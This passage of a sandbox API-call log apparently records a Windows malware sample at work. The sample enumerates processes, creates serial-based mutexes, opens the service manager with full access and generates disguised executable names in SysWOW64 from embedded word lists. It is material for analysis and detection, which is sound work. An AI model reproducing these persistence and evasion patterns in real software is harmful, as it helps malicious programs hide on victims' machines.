th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0143.465] GetCurrentProcessId () returned 0xc80 [0143.465] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0143.466] GetCurrentProcessId () returned 0xc80 [0143.466] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0143.466] GetCurrentProcessId () returned 0xc80 [0143.466] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0143.467] GetCurrentProcessId () returned 0xc80 [0143.467] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.468] GetCurrentProcessId () returned 0xc80 [0143.468] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.468] GetCurrentProcessId () returned 0xc80 [0143.468] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0143.469] GetCurrentProcessId () returned 0xc80 [0143.469] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4e, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.470] GetCurrentProcessId () returned 0xc80 [0143.470] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.470] GetCurrentProcessId () returned 0xc80 [0143.470] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.471] GetCurrentProcessId () returned 0xc80 [0143.471] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.472] GetCurrentProcessId () returned 0xc80 [0143.472] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.473] GetCurrentProcessId () returned 0xc80 [0143.473] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.473] GetCurrentProcessId () returned 0xc80 [0143.473] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0143.474] GetCurrentProcessId () returned 0xc80 [0143.474] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.475] GetCurrentProcessId () returned 0xc80 [0143.475] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.475] GetCurrentProcessId () returned 0xc80 [0143.475] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0143.476] GetCurrentProcessId () returned 0xc80 [0143.476] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.477] GetCurrentProcessId () returned 0xc80 [0143.477] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0143.477] GetCurrentProcessId () returned 0xc80 [0143.477] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0143.478] GetCurrentProcessId () returned 0xc80 [0143.478] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x32, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0143.479] GetCurrentProcessId () returned 0xc80 [0143.479] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0143.480] GetCurrentProcessId () returned 0xc80 [0143.480] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0143.480] GetCurrentProcessId () returned 0xc80 [0143.480] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0143.481] GetCurrentProcessId () returned 0xc80 [0143.481] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="commands xerox relationship.exe")) returned 1 [0143.482] GetCurrentProcessId () returned 0xc80 [0143.482] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nice-cu-characteristic.exe")) returned 1 [0143.482] GetCurrentProcessId () returned 0xc80 [0143.482] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shift.exe")) returned 1 [0143.483] GetCurrentProcessId () returned 0xc80 [0143.483] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x418, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="assuming.exe")) returned 1 [0143.483] GetCurrentProcessId () returned 0xc80 [0143.484] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fantasy-snap-charity.exe")) returned 1 [0143.484] GetCurrentProcessId () returned 0xc80 [0143.484] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x838, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="node_selections.exe")) returned 1 [0143.485] GetCurrentProcessId () returned 0xc80 [0143.485] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x554, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knitting.exe")) returned 1 [0143.486] GetCurrentProcessId () returned 0xc80 [0143.486] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x81c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="numericromancejake.exe")) returned 1 [0143.486] GetCurrentProcessId () returned 0xc80 [0143.486] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x888, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="casio flavor.exe")) returned 1 [0143.487] GetCurrentProcessId () returned 0xc80 [0143.487] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="friday_escape_populations.exe")) returned 1 [0143.487] GetCurrentProcessId () returned 0xc80 [0143.487] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="kg-tools.exe")) returned 1 [0143.488] GetCurrentProcessId () returned 0xc80 [0143.488] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="strengths_affected.exe")) returned 1 [0143.489] GetCurrentProcessId () returned 0xc80 [0143.489] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="broadcast officers.exe")) returned 1 [0143.489] GetCurrentProcessId () returned 0xc80 [0143.489] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bulgariageneratingprogram.exe")) returned 1 [0143.490] GetCurrentProcessId () returned 0xc80 [0143.490] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="orlando.exe")) returned 1 [0143.491] GetCurrentProcessId () returned 0xc80 [0143.491] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="facial_violence.exe")) returned 1 [0143.492] GetCurrentProcessId () returned 0xc80 [0143.492] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x65c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rings ownership printable.exe")) returned 1 [0143.492] GetCurrentProcessId () returned 0xc80 [0143.492] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x57c, pcPriClassBase=8, dwFlags=0x0, szExeFile="article.exe")) returned 1 [0143.493] GetCurrentProcessId () returned 0xc80 [0143.493] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x32c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0143.494] GetCurrentProcessId () returned 0xc80 [0143.494] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0xe78, pcPriClassBase=13, dwFlags=0x0, szExeFile="sample.exe")) returned 1 [0143.494] GetCurrentProcessId () returned 0xc80 [0143.494] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0143.495] GetCurrentProcessId () returned 0xc80 [0143.495] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0143.496] GetCurrentProcessId () returned 0xc80 [0143.496] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0143.497] GetCurrentProcessId () returned 0xc80 [0143.497] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0143.497] GetCurrentProcessId () returned 0xc80 [0143.497] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xad0, pcPriClassBase=13, dwFlags=0x0, szExeFile="indexerneutral.exe")) returned 1 [0143.498] GetCurrentProcessId () returned 0xc80 [0143.498] CloseHandle (hObject=0xac) returned 1 [0143.498] _snwprintf (in: _Dest=0x19fe60, _Count=0x40, _Format="PEM%X" | out: _Dest="PEMAD0") returned 6 [0143.498] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="PEMAD0") returned 0xac [0143.499] GetLastError () returned 0xb7 [0143.499] _snwprintf (in: _Dest=0x19fee0, _Count=0x40, _Format="PEE%X" | out: _Dest="PEEAD0") returned 6 [0143.499] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="PEEAD0") returned 0xb4 [0143.499] SetEvent (hEvent=0xb4) returned 1 [0143.500] CloseHandle (hObject=0xb4) returned 1 [0143.500] CloseHandle (hObject=0xac) returned 1 [0143.501] GetWindowsDirectoryW (in: lpBuffer=0x19fc90, uSize=0x104 | out: lpBuffer="C:\\Windows") returned 0xa [0143.501] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x415a04, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x415a04*=0xd2ca4def, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0143.501] _snwprintf (in: _Dest=0x19fe18, _Count=0x40, _Format="Global\\I%X" | out: _Dest="Global\\ID2CA4DEF") returned 16 [0143.501] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\ID2CA4DEF") returned 0xac [0143.501] WaitForSingleObject (hHandle=0xac, dwMilliseconds=0x0) returned 0x0 [0143.501] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\M%X" | out: _Dest="Global\\MD2CA4DEF") returned 16 [0143.501] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\MD2CA4DEF") returned 0xb4 [0143.501] _snwprintf (in: _Dest=0x19fd88, _Count=0x40, _Format="Global\\E%X" | out: _Dest="Global\\ED2CA4DEF") returned 16 [0143.501] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName="Global\\ED2CA4DEF") returned 0xb8 [0143.502] SignalObjectAndWait (hObjectToSignal=0xb8, hObjectToWaitOn=0xb4, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x80 [0143.554] ResetEvent (hEvent=0xb8) returned 1 [0143.554] ReleaseMutex (hMutex=0xac) returned 1 [0143.554] CloseHandle (hObject=0xac) returned 1 [0143.555] LoadLibraryW (lpLibFileName="user32.dll") returned 0x76c70000 [0143.555] _snwprintf (in: _Dest=0x19fea8, _Count=0x40, _Format="LDWCN%X" | out: _Dest="LDWCND2CA4DEF") returned 13 [0143.555] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0143.555] RegisterClassExW (param_1=0x19ff48) returned 0xc058 [0143.555] GetModuleHandleW (lpModuleName=0x0) returned 0x400000 [0143.556] CreateWindowExW (dwExStyle=0x0, lpClassName="LDWCND2CA4DEF", lpWindowName=0x0, dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x4002e [0143.556] GetTickCount () returned 0x281f7 [0143.556] SetTimer (hWnd=0x4002e, nIDEvent=0x1152a77, uElapse=0x3e8, lpTimerFunc=0x40cce0) returned 0x1152a77 [0143.557] GetTickCount () returned 0x281f7 [0143.557] GetTickCount () returned 0x281f7 [0143.557] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0144.558] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0144.558] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1152e6f [0144.558] GetTickCount () returned 0x285ef [0144.558] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0144.558] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0145.558] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0145.558] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1153257 [0145.558] GetTickCount () returned 0x289d7 [0145.558] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0145.558] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0146.682] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0146.682] DispatchMessageW (lpMsg=0x19ff2c) returned 0x11536ac [0146.682] GetTickCount () returned 0x28e2c [0146.682] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0146.682] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0147.725] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0147.725] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1153ac3 [0147.725] GetTickCount () returned 0x29243 [0147.725] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0147.725] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0148.853] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0148.853] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1153f28 [0148.853] GetTickCount () returned 0x296a8 [0148.853] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0x0) returned 0x102 [0148.853] GetMessageW (in: lpMsg=0x19ff2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x19ff2c) returned 1 [0149.869] TranslateMessage (lpMsg=0x19ff2c) returned 0 [0149.869] DispatchMessageW (lpMsg=0x19ff2c) returned 0x1155996 [0149.869] GetTickCount () returned 0x29aa0 [0149.869] LoadLibraryW (lpLibFileName="advapi32.dll") returned 0x77550000 [0149.869] LoadLibraryW (lpLibFileName="shell32.dll") returned 0x75310000 [0149.890] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0xf003f) returned 0x647d50 [0149.893] CloseServiceHandle (hSCObject=0x647d50) returned 1 [0149.893] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x4183f8, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe")) returned 0x26 [0149.893] lstrlenA (lpString="not,ripple,svcs,serv,wab,shader,single,without,wcs,define,eap,culture,slide,zip,tmpl,mini,polic,panes,earcon,menus,detect,form,uuidgen,pnp,admin,tuip,avatar,started,dasmrc,alaska,guids,wfp,adam,wgx,lime,indexer,repl,dev,mapi,resw,daf,diag,iss,vsc,turned,neutral,sat,source,enroll,mfidl,idl,based,right,cbs,radar,avg,wordpad,metagen,mouse,iprop,mdmmcd,jersey,thunk,subs") returned 368 [0149.893] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x4181f0 | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0149.895] _snwprintf (in: _Dest=0x417ee0, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\indexerneutral.exe") returned 38 [0149.895] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\indexerneutral.exe" (normalized: "c:\\windows\\syswow64\\indexerneutral.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x19c [0149.896] CreateFileMappingW (hFile=0x19c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x1a4 [0149.896] MapViewOfFile (hFileMappingObject=0x1a4, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xab0000 [0149.896] GetFileSize (in: hFile=0x19c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x6e708 [0149.896] RtlComputeCrc32 (PartialCrc=0x0, Buffer=0xab0000, Length=0x6e708) returned 0x69cea440 [0149.898] UnmapViewOfFile (lpBaseAddress=0xab0000) returned 1 [0149.903] CloseHandle (hObject=0x1a4) returned 1 [0149.903] CloseHandle (hObject=0x19c) returned 1 [0149.903] GetComputerNameW (in: lpBuffer=0x19fcc0, nSize=0x19fcf0 | out: lpBuffer="LHNIWSJ", nSize=0x19fcf0) returned 1 [0149.903] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="LHNIWSJ", cchWideChar=-1, lpMultiByteStr=0x19fce0, cbMultiByte=16, lpDefaultChar=0x646c58, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LHNIWSJ", lpUsedDefaultChar=0x0) returned 8 [0149.903] _snprintf (in: _Dest=0x4180e8, _Count=0x104, _Format="%s_%08X" | out: _Dest="LHNIWSJ_D2CA4DEF") returned 16 [0149.903] lstrlenA (lpString="steps,intel,cyan,sbs,emit,graph,work,fix,restore,select,bml,iprop,reports,balloon,hop,symbol,mddefw,cyrl,map,shims,iface,portto,ras,eula,pdh,sync,etl,wpc,dsm,cat,archive,pass,did,rule,compile,bundle,merged,keyand,android,compare,stg,mnu,lanes,dir,dmi,lime,route,tap,cch,msra,running,boost,jit,diala,fetch,tabbtn,sendand,vert,imp,the,clear,role,drv,readme") returned 354 [0149.903] _snwprintf (in: _Dest=0x19faec, _Count=0x104, _Format="%s\\%s.exe" | out: _Dest="C:\\Windows\\SysWOW64\\eulacompile.exe") returned 35 [0149.903] DeleteFileW 